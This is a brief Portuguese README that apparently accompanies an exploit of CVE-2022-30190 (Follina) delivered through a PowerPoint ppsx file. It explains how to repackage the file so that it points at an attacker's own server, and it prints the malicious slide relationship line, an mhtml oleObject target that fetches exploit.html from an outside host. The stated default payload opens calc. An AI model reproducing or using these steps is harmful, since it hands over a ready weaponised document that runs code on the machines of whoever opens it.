
Este é um exploit do CVE-2022-30190 no PowerPoint.
Este é o exploit do CVE-2022-30190 no PowerPoint.
Modifique o sufixo do arquivo para 'zip' e descompacte o arquivo, você pode editar \ppt\slides\_rels\slide1.xml.rels e substituir pelo seu ip:porta (vps) assim, então compacte-os da mesma forma e altere o sufixo para 'ppsx'. O payload padrão em 'exploit.html' é executar o calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
referência: https://github.com/chvancooten/follina.py